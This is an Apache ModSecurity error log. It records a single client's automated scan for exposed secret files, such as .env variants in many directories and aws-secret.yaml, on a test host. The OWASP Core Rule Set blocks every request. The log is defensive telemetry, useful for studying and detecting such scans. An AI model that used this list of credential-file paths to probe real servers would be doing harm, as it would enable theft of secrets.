[Wed Jul 23 18:17:07.768484 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8gAAAAQ"]
[Wed Jul 23 18:17:07.768697 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8gAAAAQ"]
[Wed Jul 23 18:17:07.768858 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8gAAAAQ"]
[Wed Jul 23 18:17:07.789020 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8wAAAAQ"]
[Wed Jul 23 18:17:07.789223 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8wAAAAQ"]
[Wed Jul 23 18:17:07.789380 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8wAAAAQ"]
[Wed Jul 23 18:17:07.809587 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aIELA26wfjR6tSMvn7_O9AAAAAQ"]
[Wed Jul 23 18:17:07.809805 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aIELA26wfjR6tSMvn7_O9AAAAAQ"]
[Wed Jul 23 18:17:07.809969 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aIELA26wfjR6tSMvn7_O9AAAAAQ"]
[Wed Jul 23 18:17:07.830395 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aIELA26wfjR6tSMvn7_O9QAAAAQ"]
[Wed Jul 23 18:17:07.830628 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aIELA26wfjR6tSMvn7_O9QAAAAQ"]
[Wed Jul 23 18:17:07.830803 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aIELA26wfjR6tSMvn7_O9QAAAAQ"]
[Wed Jul 23 18:17:07.851217 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aIELA26wfjR6tSMvn7_O9gAAAAQ"]
[Wed Jul 23 18:17:07.851448 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aIELA26wfjR6tSMvn7_O9gAAAAQ"]
[Wed Jul 23 18:17:07.851649 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aIELA26wfjR6tSMvn7_O9gAAAAQ"]
[Wed Jul 23 18:17:07.871880 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aIELA26wfjR6tSMvn7_O9wAAAAQ"]
[Wed Jul 23 18:17:07.872107 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aIELA26wfjR6tSMvn7_O9wAAAAQ"]
[Wed Jul 23 18:17:07.872281 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aIELA26wfjR6tSMvn7_O9wAAAAQ"]
[Wed Jul 23 18:17:08.050210 2025] [authz_core:error] [pid 1389900] [client 185.177.72.107:17598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml
[Wed Jul 23 18:17:08.071029 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aIELBG6wfjR6tSMvn7_O_QAAAAQ"]
[Wed Jul 23 18:17:08.071273 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aIELBG6wfjR6tSMvn7_O_QAAAAQ"]
[Wed Jul 23 18:17:08.071456 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aIELBG6wfjR6tSMvn7_O_QAAAAQ"]
[Wed Jul 23 18:17:08.092588 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aIELBG6wfjR6tSMvn7_O_gAAAAQ"]
[Wed Jul 23 18:17:08.092831 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aIELBG6wfjR6tSMvn7_O_gAAAAQ"]
[Wed Jul 23 18:17:08.093003 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aIELBG6wfjR6tSMvn7_O_gAAAAQ"]
[Wed Jul 23 18:17:08.113512 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aIELBG6wfjR6tSMvn7_O_wAAAAQ"]
[Wed Jul 23 18:17:08.113752 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aIELBG6wfjR6tSMvn7_O_wAAAAQ"]
[Wed Jul 23 18:17:08.114078 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aIELBG6wfjR6tSMvn7_O_wAAAAQ"]
[Wed Jul 23 18:17:08.135292 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PAAAAAAQ"]
[Wed Jul 23 18:17:08.135522 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PAAAAAAQ"]
[Wed Jul 23 18:17:08.135692 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PAAAAAAQ"]
[Wed Jul 23 18:17:08.156700 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PAQAAAAQ"]
[Wed Jul 23 18:17:08.156933 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PAQAAAAQ"]
[Wed Jul 23 18:17:08.157113 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PAQAAAAQ"]
[Wed Jul 23 18:17:08.256272 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBAAAAAQ"]
[Wed Jul 23 18:17:08.256516 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBAAAAAQ"]
[Wed Jul 23 18:17:08.256698 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBAAAAAQ"]
[Wed Jul 23 18:17:08.277198 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBQAAAAQ"]
[Wed Jul 23 18:17:08.277421 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBQAAAAQ"]
[Wed Jul 23 18:17:08.277597 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBQAAAAQ"]
[Wed Jul 23 18:17:08.298160 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aIELBG6wfjR6tSMvn7_PBgAAAAQ"]
